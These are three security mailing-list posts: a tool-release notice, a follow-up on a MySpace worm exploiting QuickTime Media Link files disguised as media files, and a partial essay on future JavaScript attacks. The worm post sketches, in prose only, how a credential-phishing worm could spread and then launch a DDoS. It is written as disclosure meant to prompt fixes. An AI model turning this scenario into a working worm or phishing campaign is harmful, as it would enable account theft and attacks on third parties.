just for Christmas, there is a new backframe release: http://www.gnucitizen.org/backframe/ http://www.gnucitizen.org/projects/backframe/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New MySpace worm could be on its way
http://www.gnucitizen.org/blog/myspace-quicktime-worm-follow-up MySpace was hit by a worm in a semi-automatic manner. This time the worm propagated via a QuickTime flaw found a couple of months ago. This shouldn't be a surprise to anyone. It is quite serious that this attack vector was picked up by Apple so late. In this post I am not going to explain how this particular MySpace hack works but rather to send a reminder to the security community that another http://www.gnucitizen.org/blog/backdooring-mp3-files QuickTime XSS vector was found right after the first one. This vector can be used in a similar way although, IMHO, the impact is greater. I guess Apple should fix both issues NOW: we don't want MySpace worms spreading around again, although this is very utopic to say. Here is a brief reminder of what the XSS issue was all about. The problems is caused by a quite useful feature called QuickTime Media Link (.qtl). The whole point of these QuickTime Media Link files is to provide means of playing media files in a more accessible way. In this respect the developer can create a .qtl file which holds information about the media content that needs to be played plus recommended dimensions, accessibility features, control features etc... .qtl files can contain malicious JavaScript code that can takeover some important network device when executed for example. That's not the end of the story though. Because of its flexibility QuickTime doesn't mind if Media Link (.qtl) files end with .mp3, .mp4, .m4a or even .mov extension... This is a quite big problem especially in default configurations of iTunes. The iTunes installation wizard installs the QuickTime player and QuickTime browser plugins and associates various media files with its components. If you open an mp3 file from the desktop it will be played in iTunes player by default, however if you open it from some website it will be played in the QuickTime player browser plugin. In this respect, users who are previewing mp3 and other media files from the Internet are vulnerable. GNUCITIZEN Backdooring MP3 Files To sum up, and put into context, attackers can use QuickTime Media Links to imitate popular media files and as such trick the user into opening malicious content that could lead to their (MySpace) account or their browser being compromised. Lets look at the following hypothetical situation: Evil Hacker decides to overtake MySpace in order to DoS google.com. He finds that MySpace allows users to supply links in their posts and comments. He spends some time to research the 1000 most popular MySpace members where he will post links to media files titled orgy.mov or myconfession.mp3 or even prankster.avi. Once an unaware user clicks on the link, a phishing page is presented asking the current user to enter their MySpace details to see the private content. If the user is tricked, their credentials will be on their way to the specifically designed for that operation collection point where another automatic process overtakes their user account installing the same malicious file or simply hijack other media files by wrapping them up in QuickTime Media Links the same way it is described in the article mentioned above. The process repeats when another users falls into the trap. When enough number of accounts are compromised Evil Hacker will launch his/her DDoS against Google's AdSense server farm. Before seeing more worms of this kind I suggest that we gather our intellectual power to find a fix or at least a workaround. I welcome you to join me at GNUCITIZEN's MySpace Worms Topic http://www.gnucitizen.org/topics/myspace-worms for further discussion. I can assure you that GNUCITIZEN neither me has anything to do with MySpace or any other related organization. The purpose of this symposium is learn more about these types of worms and help other online applications and communities protect themselves. This is much better than just sitting in our comfy chairs and laughing at people's mistakes. Many thanks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The state of JavaScript Hacking
will want to push down their Apollo technology to every single computer on the this planet. And guess what, JavaScript has access to Apollo's runtime just like Firefox and Opera has access to Java via LiveConnect. If you develop applications with Apollo and you don't set the security model properly the RSS feeds your are eating may start eating you. Last but not least we have Microsoft with their XAML and WPF (Windows Presentation Foundation). I am sure that not that many people have heard of these technologies so let me explain what they are in brief. They are the Microsoft's way to do RIA. The only thing is that they relay on .NET3 which makes them explicitly for Windows. I am not sure what is the state of the MONO project though. WPF will allow you to build Rich Internet Applications with XML, CSS and .NET. .NET supports many languages one of which is JavaScript. Try to do some coding in ASP and you will see that it feels the same as browser JavaScript. This is JavaScript on the server, the browser and the desktop. It enables web worms and future high-end attackers to a degree hardly imaginable by anyone today. So what will be the state of JavaScript hacking in the future? WEB technologies will spread all over our lives. Your fridge and mobile will be powered by Flash Light and Java. Your desktop will be crowded with WPF games and Apollo goodies. Your website will run on AJAX, CSS and XHTML. Code once, destruct everywhere! If you are still not convinced that this is not a joke I really don't know where to forward you to for more information. I guess you should wait until things start happening. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/